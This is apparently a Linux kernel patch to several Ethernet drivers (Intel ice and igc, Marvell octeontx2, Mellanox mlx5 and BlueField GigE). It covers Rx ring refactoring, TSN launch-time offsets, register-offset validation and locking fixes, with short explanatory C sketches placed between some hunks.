+  * @size: size of buffer to add to skb
+- * @rx_buf_pgcnt: rx_buf page refcount
++ * @ntc: index of next to clean element
+  *
+  * This function will pull an Rx buffer from the ring and synchronize it
+  * for use by the CPU.
+  */
+ static struct ice_rx_buf *
+ ice_get_rx_buf(struct ice_rx_ring *rx_ring, const unsigned int size,
+-	       int *rx_buf_pgcnt)
++	       const unsigned int ntc)
+ {
+ 	struct ice_rx_buf *rx_buf;
+ 
+-	rx_buf = &rx_ring->rx_buf[rx_ring->next_to_clean];
+-	*rx_buf_pgcnt =
+-#if (PAGE_SIZE < 8192)
+-		page_count(rx_buf->page);
+-#else
+-		0;
+-#endif
++	rx_buf = &rx_ring->rx_buf[ntc];
++	rx_buf->pgcnt = page_count(rx_buf->page);
+ 	prefetchw(rx_buf->page);
+ 
+ 	if (!size)
+@@ -973,7 +974,6 @@ ice_build_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+ /**
+  * ice_construct_skb - Allocate skb and populate it
+  * @rx_ring: Rx descriptor ring to transact packets on
+- * @rx_buf: Rx buffer to pull data from
+  * @xdp: xdp_buff pointing to the data
+  *
+  * This function allocates an skb. It then populates it with the page
+@@ -984,17 +984,15 @@ static struct sk_buff *
+ ice_construct_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+ 		  struct xdp_buff *xdp)
+ {
+-	unsigned int metasize = xdp->data - xdp->data_meta;
+ 	unsigned int size = xdp->data_end - xdp->data;
+ 	unsigned int headlen;
+ 	struct sk_buff *skb;
+ 
+ 	/* prefetch first cache line of first page */
+-	net_prefetch(xdp->data_meta);
++	net_prefetch(xdp->data);
+ 
+ 	/* allocate a skb to store the frags */
+-	skb = __napi_alloc_skb(&rx_ring->q_vector->napi,
+-			       ICE_RX_HDR_SIZE + metasize,
++	skb = __napi_alloc_skb(&rx_ring->q_vector->napi, ICE_RX_HDR_SIZE,
+ 			       GFP_ATOMIC | __GFP_NOWARN);
+ 	if (unlikely(!skb))
+ 		return NULL;
+@@ -1006,13 +1004,8 @@ ice_construct_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+ 		headlen = eth_get_headlen(skb->dev, xdp->data, ICE_RX_HDR_SIZE);
+ 
+ 	/* align pull length to size of long to optimize memcpy performance */
+-	memcpy(__skb_put(skb, headlen + metasize), xdp->data_meta,
+-	       ALIGN(headlen + metasize, sizeof(long)));
+-
+-	if (metasize) {
+-		skb_metadata_set(skb, metasize);
+-		__skb_pull(skb, metasize);
+-	}
++	memcpy(__skb_put(skb, headlen), xdp->data, ALIGN(headlen,
++							 sizeof(long)));
+ 
+ 	/* if we exhaust the linear part then add what is left as a frag */
+ 	size -= headlen;
+@@ -1041,26 +1034,17 @@ ice_construct_skb(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+  * ice_put_rx_buf - Clean up used buffer and either recycle or free
+  * @rx_ring: Rx descriptor ring to transact packets on
+  * @rx_buf: Rx buffer to pull data from
+- * @rx_buf_pgcnt: Rx buffer page count pre xdp_do_redirect()
+  *
+- * This function will update next_to_clean and then clean up the contents
+- * of the rx_buf. It will either recycle the buffer or unmap it and free
+- * the associated resources.
++ * This function will clean up the contents of the rx_buf. It will either
++ * recycle the buffer or unmap it and free the associated resources.
+  */
+ static void
+-ice_put_rx_buf(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf,
+-	       int rx_buf_pgcnt)
++ice_put_rx_buf(struct ice_rx_ring *rx_ring, struct ice_rx_buf *rx_buf)
+ {
+-	u16 ntc = rx_ring->next_to_clean + 1;
+-
+-	/* fetch, update, and store next to clean */
+-	ntc = (ntc < rx_ring->count) ? ntc : 0;
+-	rx_ring->next_to_clean = ntc;
+-
+ 	if (!rx_buf)
+ 		return;
+ 
+-	if (ice_can_reuse_rx_page(rx_buf, rx_buf_pgcnt)) {
++	if (ice_can_reuse_rx_page(rx_buf)) {
+ 		/* hand second half of page back to the ring */
+ 		ice_reuse_rx_page(rx_ring, rx_buf);
+ 	} else {
+@@ -1110,21 +1094,22 @@ ice_is_non_eop(struct ice_rx_ring *rx_ring, union ice_32b_rx_flex_desc *rx_desc)
+  */
+ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ {
+-	unsigned int total_rx_bytes = 0, total_rx_pkts = 0, frame_sz = 0;
++	unsigned int total_rx_bytes = 0, total_rx_pkts = 0;
+ 	u16 cleaned_count = ICE_DESC_UNUSED(rx_ring);
+ 	unsigned int offset = rx_ring->rx_offset;
++	struct xdp_buff *xdp = &rx_ring->xdp;
+ 	struct ice_tx_ring *xdp_ring = NULL;
+ 	unsigned int xdp_res, xdp_xmit = 0;
+ 	struct sk_buff *skb = rx_ring->skb;
+ 	struct bpf_prog *xdp_prog = NULL;
+-	struct xdp_buff xdp;
++	u32 ntc = rx_ring->next_to_clean;
++	u32 cnt = rx_ring->count;
+ 	bool failure;
+ 
+ 	/* Frame size depend on rx_ring setup when PAGE_SIZE=4K */
+ #if (PAGE_SIZE < 8192)
+-	frame_sz = ice_rx_frame_truesize(rx_ring, 0);
++	xdp->frame_sz = ice_rx_frame_truesize(rx_ring, 0);
+ #endif
+-	xdp_init_buff(&xdp, frame_sz, &rx_ring->xdp_rxq);
+ 
+ 	xdp_prog = READ_ONCE(rx_ring->xdp_prog);
+ 	if (xdp_prog)
+@@ -1137,12 +1122,11 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 		unsigned char *hard_start;
+ 		unsigned int size;
+ 		u16 stat_err_bits;
+-		int rx_buf_pgcnt;
+ 		u16 vlan_tag = 0;
+ 		u16 rx_ptype;
+ 
+ 		/* get the Rx desc from Rx ring based on 'next_to_clean' */
+-		rx_desc = ICE_RX_DESC(rx_ring, rx_ring->next_to_clean);
++		rx_desc = ICE_RX_DESC(rx_ring, ntc);
+ 
+ 		/* status_error_len will always be zero for unused descriptors
+ 		 * because it's cleared in cleanup, and overlaps with hdr_addr
+@@ -1166,7 +1150,9 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 			if (rx_desc->wb.rxdid == FDIR_DESC_RXDID &&
+ 			    ctrl_vsi->vf)
+ 				ice_vc_fdir_irq_handler(ctrl_vsi, rx_desc);
+-			ice_put_rx_buf(rx_ring, NULL, 0);
++			if (++ntc == cnt)
++				ntc = 0;
++			ice_put_rx_buf(rx_ring, NULL);
+ 			cleaned_count++;
+ 			continue;
+ 		}
+@@ -1175,33 +1161,33 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 			ICE_RX_FLX_DESC_PKT_LEN_M;
+ 
+ 		/* retrieve a buffer from the ring */
+-		rx_buf = ice_get_rx_buf(rx_ring, size, &rx_buf_pgcnt);
++		rx_buf = ice_get_rx_buf(rx_ring, size, ntc);
+ 
+ 		if (!size) {
+-			xdp.data = NULL;
+-			xdp.data_end = NULL;
+-			xdp.data_hard_start = NULL;
+-			xdp.data_meta = NULL;
++			xdp->data = NULL;
++			xdp->data_end = NULL;
++			xdp->data_hard_start = NULL;
++			xdp->data_meta = NULL;
+ 			goto construct_skb;
+ 		}
+ 
+ 		hard_start = page_address(rx_buf->page) + rx_buf->page_offset -
+ 			     offset;
+-		xdp_prepare_buff(&xdp, hard_start, offset, size, true);
++		xdp_prepare_buff(xdp, hard_start, offset, size, !!offset);
+ #if (PAGE_SIZE > 4096)
+ 		/* At larger PAGE_SIZE, frame_sz depend on len size */
+-		xdp.frame_sz = ice_rx_frame_truesize(rx_ring, size);
++		xdp->frame_sz = ice_rx_frame_truesize(rx_ring, size);
+ #endif
+ 
+ 		if (!xdp_prog)
+ 			goto construct_skb;
+ 
+-		xdp_res = ice_run_xdp(rx_ring, &xdp, xdp_prog, xdp_ring);
++		xdp_res = ice_run_xdp(rx_ring, xdp, xdp_prog, xdp_ring);
+ 		if (!xdp_res)
+ 			goto construct_skb;
+ 		if (xdp_res & (ICE_XDP_TX | ICE_XDP_REDIR)) {
+ 			xdp_xmit |= xdp_res;
+-			ice_rx_buf_adjust_pg_offset(rx_buf, xdp.frame_sz);
++			ice_rx_buf_adjust_pg_offset(rx_buf, xdp->frame_sz);
+ 		} else {
+ 			rx_buf->pagecnt_bias++;
+ 		}
+@@ -1209,16 +1195,18 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 		total_rx_pkts++;
+ 
+ 		cleaned_count++;
+-		ice_put_rx_buf(rx_ring, rx_buf, rx_buf_pgcnt);
++		if (++ntc == cnt)
++			ntc = 0;
++		ice_put_rx_buf(rx_ring, rx_buf);
+ 		continue;
+ construct_skb:
+ 		if (skb) {
+ 			ice_add_rx_frag(rx_ring, rx_buf, skb, size);
+-		} else if (likely(xdp.data)) {
++		} else if (likely(xdp->data)) {
+ 			if (ice_ring_uses_build_skb(rx_ring))
+-				skb = ice_build_skb(rx_ring, rx_buf, &xdp);
++				skb = ice_build_skb(rx_ring, rx_buf, xdp);
+ 			else
+-				skb = ice_construct_skb(rx_ring, rx_buf, &xdp);
++				skb = ice_construct_skb(rx_ring, rx_buf, xdp);
+ 		}
+ 		/* exit if we failed to retrieve a buffer */
+ 		if (!skb) {
+@@ -1228,7 +1216,9 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 			break;
+ 		}
+ 
+-		ice_put_rx_buf(rx_ring, rx_buf, rx_buf_pgcnt);
++		if (++ntc == cnt)
++			ntc = 0;
++		ice_put_rx_buf(rx_ring, rx_buf);
+ 		cleaned_count++;
+ 
+ 		/* skip if it is NOP desc */
+@@ -1268,6 +1258,7 @@ int ice_clean_rx_irq(struct ice_rx_ring *rx_ring, int budget)
+ 		total_rx_pkts++;
+ 	}
+ 
++	rx_ring->next_to_clean = ntc;
+ 	/* return up to cleaned_count buffers to hardware */
+ 	failure = ice_alloc_rx_bufs(rx_ring, cleaned_count);
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx.h b/drivers/net/ethernet/intel/ice/ice_txrx.h
+index 932b5661ec4d6..c1d9b3cebb059 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx.h
++++ b/drivers/net/ethernet/intel/ice/ice_txrx.h
+@@ -9,10 +9,12 @@
+ #define ICE_DFLT_IRQ_WORK	256
+ #define ICE_RXBUF_3072		3072
+ #define ICE_RXBUF_2048		2048
++#define ICE_RXBUF_1664		1664
+ #define ICE_RXBUF_1536		1536
+ #define ICE_MAX_CHAINED_RX_BUFS	5
+ #define ICE_MAX_BUF_TXD		8
+ #define ICE_MIN_TX_LEN		17
++#define ICE_MAX_FRAME_LEGACY_RX 8320
+ 
+ /* The size limit for a transmit buffer in a descriptor is (16K - 1).
+  * In order to align with the read requests we will align the value to
+@@ -170,7 +172,8 @@ struct ice_rx_buf {
+ 	dma_addr_t dma;
+ 	struct page *page;
+ 	unsigned int page_offset;
+-	u16 pagecnt_bias;
++	unsigned int pgcnt;
++	unsigned int pagecnt_bias;
+ };
+ 
+ struct ice_q_stats {
+@@ -293,6 +296,7 @@ struct ice_rx_ring {
+ 	struct bpf_prog *xdp_prog;
+ 	struct ice_tx_ring *xdp_ring;
+ 	struct xsk_buff_pool *xsk_pool;
++	struct xdp_buff xdp;
+ 	struct sk_buff *skb;
+ 	dma_addr_t dma;			/* physical address of ring */
+ 	u64 cached_phctime;
+diff --git a/drivers/net/ethernet/intel/ice/ice_txrx_lib.c b/drivers/net/ethernet/intel/ice/ice_txrx_lib.c
+index 7ee38d02d1e57..d137b98d78eb6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_txrx_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_txrx_lib.c
+@@ -349,6 +349,7 @@ int ice_xmit_xdp_buff(struct xdp_buff *xdp, struct ice_tx_ring *xdp_ring)
+  * ice_finalize_xdp_rx - Bump XDP Tx tail and/or flush redirect map
+  * @xdp_ring: XDP ring
+  * @xdp_res: Result of the receive batch
++ * @first_idx: index to write from caller
+  *
+  * This function bumps XDP Tx tail and/or flush redirect map, and
+  * should be called when a batch of packets has been processed in the
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index efdabcbd66ddd..8187a658dcbd5 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -402,6 +402,21 @@
+ #define IGC_DTXMXPKTSZ_TSN	0x19 /* 1600 bytes of max TX DMA packet size */
+ #define IGC_DTXMXPKTSZ_DEFAULT	0x98 /* 9728-byte Jumbo frames */
+ 
++/* Retry Buffer Control */
++#define IGC_RETX_CTL			0x041C
++#define IGC_RETX_CTL_WATERMARK_MASK	0xF
++#define IGC_RETX_CTL_QBVFULLTH_SHIFT	8 /* QBV Retry Buffer Full Threshold */
++#define IGC_RETX_CTL_QBVFULLEN	0x1000 /* Enable QBV Retry Buffer Full Threshold */
++
++/* Transmit Scheduling Latency */
++/* Latency between transmission scheduling (LaunchTime) and the time
++ * the packet is transmitted to the network, in nanoseconds.
++ */
++#define IGC_TXOFFSET_SPEED_10	0x000034BC
++#define IGC_TXOFFSET_SPEED_100	0x00000578
++#define IGC_TXOFFSET_SPEED_1000	0x0000012C
++#define IGC_TXOFFSET_SPEED_2500	0x00000578
++
+ /* Time Sync Interrupt Causes */
+ #define IGC_TSICR_SYS_WRAP	BIT(0) /* SYSTIM Wrap around. */
+ #define IGC_TSICR_TXTS		BIT(1) /* Transmit Timestamp. */
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index e052f49cc08d7..39f8f28288aaa 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -5586,6 +5586,13 @@ static void igc_watchdog_task(struct work_struct *work)
+ 				break;
+ 			}
+ 
++			/* Once the launch time has been set on the wire, there
++			 * is a delay before the link speed can be determined
++			 * based on link-up activity. Write into the register
++			 * as soon as we know the correct link speed.
++			 */
++			igc_tsn_adjust_txtime_offset(adapter);
++
+ 			if (adapter->link_speed != SPEED_1000)
+ 				goto no_wait;
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_regs.h b/drivers/net/ethernet/intel/igc/igc_regs.h
+index c0d8214148d1d..01c86d36856d2 100644
+--- a/drivers/net/ethernet/intel/igc/igc_regs.h
++++ b/drivers/net/ethernet/intel/igc/igc_regs.h
+@@ -224,6 +224,7 @@
+ /* Transmit Scheduling Registers */
+ #define IGC_TQAVCTRL		0x3570
+ #define IGC_TXQCTL(_n)		(0x3344 + 0x4 * (_n))
++#define IGC_GTXOFFSET		0x3310
+ #define IGC_BASET_L		0x3314
+ #define IGC_BASET_H		0x3318
+ #define IGC_QBVCYCLET		0x331C
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.c b/drivers/net/ethernet/intel/igc/igc_tsn.c
+index 31ea0781b65ec..abdaaf7db4125 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.c
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.c
+@@ -49,6 +49,44 @@ static unsigned int igc_tsn_new_flags(struct igc_adapter *adapter)
+ 	return new_flags;
+ }
+ 
++void igc_tsn_adjust_txtime_offset(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++	u16 txoffset;
++
++	if (!is_any_launchtime(adapter))
++		return;
++
++	switch (adapter->link_speed) {
++	case SPEED_10:
++		txoffset = IGC_TXOFFSET_SPEED_10;
++		break;
++	case SPEED_100:
++		txoffset = IGC_TXOFFSET_SPEED_100;
++		break;
++	case SPEED_1000:
++		txoffset = IGC_TXOFFSET_SPEED_1000;
++		break;
++	case SPEED_2500:
++		txoffset = IGC_TXOFFSET_SPEED_2500;
++		break;
++	default:
++		txoffset = 0;
++		break;
++	}
++
++	wr32(IGC_GTXOFFSET, txoffset);
++}
++
++static void igc_tsn_restore_retx_default(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++	u32 retxctl;
++
++	retxctl = rd32(IGC_RETX_CTL) & IGC_RETX_CTL_WATERMARK_MASK;
++	wr32(IGC_RETX_CTL, retxctl);
++}
++
+ /* Returns the TSN specific registers to their default values after
+  * the adapter is reset.
+  */
+@@ -58,9 +96,13 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ 	u32 tqavctrl;
+ 	int i;
+ 
++	wr32(IGC_GTXOFFSET, 0);
+ 	wr32(IGC_TXPBS, I225_TXPBSIZE_DEFAULT);
+ 	wr32(IGC_DTXMXPKTSZ, IGC_DTXMXPKTSZ_DEFAULT);
+ 
++	if (igc_is_device_id_i226(hw))
++		igc_tsn_restore_retx_default(adapter);
++
+ 	tqavctrl = rd32(IGC_TQAVCTRL);
+ 	tqavctrl &= ~(IGC_TQAVCTRL_TRANSMIT_MODE_TSN |
+ 		      IGC_TQAVCTRL_ENHANCED_QAV | IGC_TQAVCTRL_FUTSCDDIS);
+@@ -81,6 +123,25 @@ static int igc_tsn_disable_offload(struct igc_adapter *adapter)
+ 	return 0;
+ }
+ 
++/* To partially fix i226 HW errata, reduce MAC internal buffering from 192 Bytes
++ * to 88 Bytes by setting RETX_CTL register using the recommendation from:
++ * a) Ethernet Controller I225/I226 Specification Update Rev 2.1
++ *    Item 9: TSN: Packet Transmission Might Cross the Qbv Window
++ * b) I225/6 SW User Manual Rev 1.2.4: Section 8.11.5 Retry Buffer Control
++ */
++static void igc_tsn_set_retx_qbvfullthreshold(struct igc_adapter *adapter)
++{
++	struct igc_hw *hw = &adapter->hw;
++	u32 retxctl, watermark;
++
++	retxctl = rd32(IGC_RETX_CTL);
++	watermark = retxctl & IGC_RETX_CTL_WATERMARK_MASK;
++	/* Set QBVFULLTH value using watermark and set QBVFULLEN */
++	retxctl |= (watermark << IGC_RETX_CTL_QBVFULLTH_SHIFT) |
++		   IGC_RETX_CTL_QBVFULLEN;
++	wr32(IGC_RETX_CTL, retxctl);
++}
++
+ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ {
+ 	struct igc_hw *hw = &adapter->hw;
+@@ -94,6 +155,9 @@ static int igc_tsn_enable_offload(struct igc_adapter *adapter)
+ 	wr32(IGC_DTXMXPKTSZ, IGC_DTXMXPKTSZ_TSN);
+ 	wr32(IGC_TXPBS, IGC_TXPBSIZE_TSN);
+ 
++	if (igc_is_device_id_i226(hw))
++		igc_tsn_set_retx_qbvfullthreshold(adapter);
++
+ 	for (i = 0; i < adapter->num_tx_queues; i++) {
+ 		struct igc_ring *ring = adapter->tx_ring[i];
+ 		u32 txqctl = 0;
+diff --git a/drivers/net/ethernet/intel/igc/igc_tsn.h b/drivers/net/ethernet/intel/igc/igc_tsn.h
+index 1512307f5a528..b53e6af560b73 100644
+--- a/drivers/net/ethernet/intel/igc/igc_tsn.h
++++ b/drivers/net/ethernet/intel/igc/igc_tsn.h
+@@ -6,5 +6,6 @@
+ 
+ int igc_tsn_offload_apply(struct igc_adapter *adapter);
+ int igc_tsn_reset(struct igc_adapter *adapter);
++void igc_tsn_adjust_txtime_offset(struct igc_adapter *adapter);
+ 
+ #endif /* _IGC_BASE_H */
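
The RETX_CTL update in the igc hunks above mirrors the 4-bit watermark into
the QBV full-threshold field and sets the enable bit in one read-modify-write.
A standalone, runnable sketch of that bit arithmetic, with the register
modeled as a plain variable and the reset value invented for illustration:

#include <stdint.h>
#include <inttypes.h>
#include <stdio.h>

#define RETX_CTL_WATERMARK_MASK   0xFu
#define RETX_CTL_QBVFULLTH_SHIFT  8
#define RETX_CTL_QBVFULLEN        0x1000u

int main(void)
{
	uint32_t retxctl = 0x0005;	/* pretend hardware reset value */
	uint32_t watermark = retxctl & RETX_CTL_WATERMARK_MASK;

	/* Copy the watermark into the threshold field, enable the check */
	retxctl |= (watermark << RETX_CTL_QBVFULLTH_SHIFT) | RETX_CTL_QBVFULLEN;
	printf("RETX_CTL: 0x%04" PRIx32 "\n", retxctl);	/* 0x1505 */

	/* Restoring the default keeps only the watermark bits, clearing
	 * both the threshold field and the enable bit in one write.
	 */
	retxctl &= RETX_CTL_WATERMARK_MASK;
	printf("RETX_CTL: 0x%04" PRIx32 "\n", retxctl);	/* 0x0005 */
	return 0;
}
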
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+index b226a4d376aab..160e044c25c24 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cpt.c
+@@ -632,7 +632,9 @@ int rvu_mbox_handler_cpt_inline_ipsec_cfg(struct rvu *rvu,
+ 	return ret;
+ }
+ 
+-static bool is_valid_offset(struct rvu *rvu, struct cpt_rd_wr_reg_msg *req)
++static bool validate_and_update_reg_offset(struct rvu *rvu,
++					   struct cpt_rd_wr_reg_msg *req,
++					   u64 *reg_offset)
+ {
+ 	u64 offset = req->reg_offset;
+ 	int blkaddr, num_lfs, lf;
+@@ -663,6 +665,11 @@ static bool is_valid_offset(struct rvu *rvu, struct cpt_rd_wr_reg_msg *req)
+ 		if (lf < 0)
+ 			return false;
+ 
++		/* Translate local LF's offset to global CPT LF's offset to
++		 * access LFX register.
++		 */
++		*reg_offset = (req->reg_offset & 0xFF000) + (lf << 3);
++
+ 		return true;
+ 	} else if (!(req->hdr.pcifunc & RVU_PFVF_FUNC_MASK)) {
+ 		/* Registers that can be accessed from PF */
+@@ -697,7 +704,7 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 					struct cpt_rd_wr_reg_msg *rsp)
+ {
+ 	u64 offset = req->reg_offset;
+-	int blkaddr, lf;
++	int blkaddr;
+ 
+ 	blkaddr = validate_and_get_cpt_blkaddr(req->blkaddr);
+ 	if (blkaddr < 0)
+@@ -708,18 +715,10 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 	    !is_cpt_vf(rvu, req->hdr.pcifunc))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
+-	if (!is_valid_offset(rvu, req))
++	if (!validate_and_update_reg_offset(rvu, req, &offset))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
+-	/* Translate local LF used by VFs to global CPT LF */
+-	lf = rvu_get_lf(rvu, &rvu->hw->block[blkaddr], req->hdr.pcifunc,
+-			(offset & 0xFFF) >> 3);
+-
+-	/* Translate local LF's offset to global CPT LF's offset */
+-	offset &= 0xFF000;
+-	offset += lf << 3;
+-
+-	rsp->reg_offset = offset;
++	rsp->reg_offset = req->reg_offset;
+ 	rsp->ret_val = req->ret_val;
+ 	rsp->is_write = req->is_write;
+ 
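
The rvu_cpt refactor above folds the LF-offset translation into the
validation helper, so a translated offset can only ever be derived from a
request that passed the checks. A minimal sketch of the out-parameter
pattern; the mask, shift, and error value are placeholders, not the octeontx2
definitions:

#include <stdbool.h>
#include <stdint.h>

static bool validate_and_update_offset(uint64_t req_offset, int lf,
				       uint64_t *reg_offset)
{
	if (lf < 0)
		return false;
	/* Keep the per-register bits, rebase onto the global LF slot. */
	*reg_offset = (req_offset & 0xFF000u) + ((uint64_t)lf << 3);
	return true;
}

static int handle_reg_access(uint64_t req_offset, int lf)
{
	uint64_t offset = req_offset;

	if (!validate_and_update_offset(req_offset, lf, &offset))
		return -1;	/* stand-in for the driver's access-denied code */
	/* ... perform the register access at 'offset' ... */
	return 0;
}
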
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c
+index 60bc5b577ab99..02d9fb0c5ec24 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c
+@@ -111,7 +111,9 @@ static int mlx5e_tx_reporter_timeout_recover(void *ctx)
+ 		return err;
+ 	}
+ 
++	mutex_lock(&priv->state_lock);
+ 	err = mlx5e_safe_reopen_channels(priv);
++	mutex_unlock(&priv->state_lock);
+ 	if (!err) {
+ 		to_ctx->status = 1; /* all channels recovered */
+ 		return err;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c
+index aac32e505c14f..a8870c6daec6c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c
+@@ -738,7 +738,7 @@ mlx5e_ethtool_flow_replace(struct mlx5e_priv *priv,
+ 	if (num_tuples <= 0) {
+ 		netdev_warn(priv->netdev, "%s: flow is not valid %d\n",
+ 			    __func__, num_tuples);
+-		return num_tuples;
++		return num_tuples < 0 ? num_tuples : -EINVAL;
+ 	}
+ 
+ 	eth_ft = get_flow_table(priv, fs, num_tuples);
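
The one-line mlx5e fix above keeps num_tuples == 0 from escaping as a success
code. A small sketch of the normalization:

#include <errno.h>

/* Map "no tuples" to a real error: a negative count is already an
 * errno, but zero must not be returned verbatim or the caller would
 * treat an invalid flow as success.
 */
static int check_tuples(int num_tuples)
{
	if (num_tuples <= 0)
		return num_tuples < 0 ? num_tuples : -EINVAL;
	return 0;
}
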
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h
+index 5a1027b072155..bf1a2883f0820 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h
+@@ -39,6 +39,7 @@
+  */
+ #define MLXBF_GIGE_BCAST_MAC_FILTER_IDX 0
+ #define MLXBF_GIGE_LOCAL_MAC_FILTER_IDX 1
++#define MLXBF_GIGE_MAX_FILTER_IDX       3
+ 
+ /* Define for broadcast MAC literal */
+ #define BCAST_MAC_ADDR 0xFFFFFFFFFFFF
+@@ -148,9 +149,13 @@ enum mlxbf_gige_res {
+ int mlxbf_gige_mdio_probe(struct platform_device *pdev,
+ 			  struct mlxbf_gige *priv);
+ void mlxbf_gige_mdio_remove(struct mlxbf_gige *priv);
+-irqreturn_t mlxbf_gige_mdio_handle_phy_interrupt(int irq, void *dev_id);
+-void mlxbf_gige_mdio_enable_phy_int(struct mlxbf_gige *priv);
+ 
++void mlxbf_gige_enable_multicast_rx(struct mlxbf_gige *priv);
++void mlxbf_gige_disable_multicast_rx(struct mlxbf_gige *priv);
++void mlxbf_gige_enable_mac_rx_filter(struct mlxbf_gige *priv,
++				     unsigned int index);
++void mlxbf_gige_disable_mac_rx_filter(struct mlxbf_gige *priv,
++				      unsigned int index);
+ void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
+ 				  unsigned int index, u64 dmac);
+ void mlxbf_gige_get_mac_rx_filter(struct mlxbf_gige *priv,
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+index d6b4d163bbbfd..6d90576fda597 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+@@ -168,6 +168,10 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	if (err)
+ 		goto napi_deinit;
+ 
++	mlxbf_gige_enable_mac_rx_filter(priv, MLXBF_GIGE_BCAST_MAC_FILTER_IDX);
++	mlxbf_gige_enable_mac_rx_filter(priv, MLXBF_GIGE_LOCAL_MAC_FILTER_IDX);
++	mlxbf_gige_enable_multicast_rx(priv);
++
+ 	/* Set bits in INT_EN that we care about */
+ 	int_en = MLXBF_GIGE_INT_EN_HW_ACCESS_ERROR |
+ 		 MLXBF_GIGE_INT_EN_TX_CHECKSUM_INPUTS |
+@@ -293,6 +297,7 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	void __iomem *plu_base;
+ 	void __iomem *base;
+ 	int addr, phy_irq;
++	unsigned int i;
+ 	int err;
+ 
+ 	base = devm_platform_ioremap_resource(pdev, MLXBF_GIGE_RES_MAC);
+@@ -335,6 +340,11 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	priv->rx_q_entries = MLXBF_GIGE_DEFAULT_RXQ_SZ;
+ 	priv->tx_q_entries = MLXBF_GIGE_DEFAULT_TXQ_SZ;
+ 
++	for (i = 0; i <= MLXBF_GIGE_MAX_FILTER_IDX; i++)
++		mlxbf_gige_disable_mac_rx_filter(priv, i);
++	mlxbf_gige_disable_multicast_rx(priv);
++	mlxbf_gige_disable_promisc(priv);
++
+ 	/* Write initial MAC address to hardware */
+ 	mlxbf_gige_initial_mac(priv);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h
+index 7be3a793984d5..d27535a1fb86f 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h
+@@ -59,6 +59,8 @@
+ #define MLXBF_GIGE_TX_STATUS_DATA_FIFO_FULL           BIT(1)
+ #define MLXBF_GIGE_RX_MAC_FILTER_DMAC_RANGE_START     0x0520
+ #define MLXBF_GIGE_RX_MAC_FILTER_DMAC_RANGE_END       0x0528
++#define MLXBF_GIGE_RX_MAC_FILTER_GENERAL              0x0530
++#define MLXBF_GIGE_RX_MAC_FILTER_EN_MULTICAST         BIT(1)
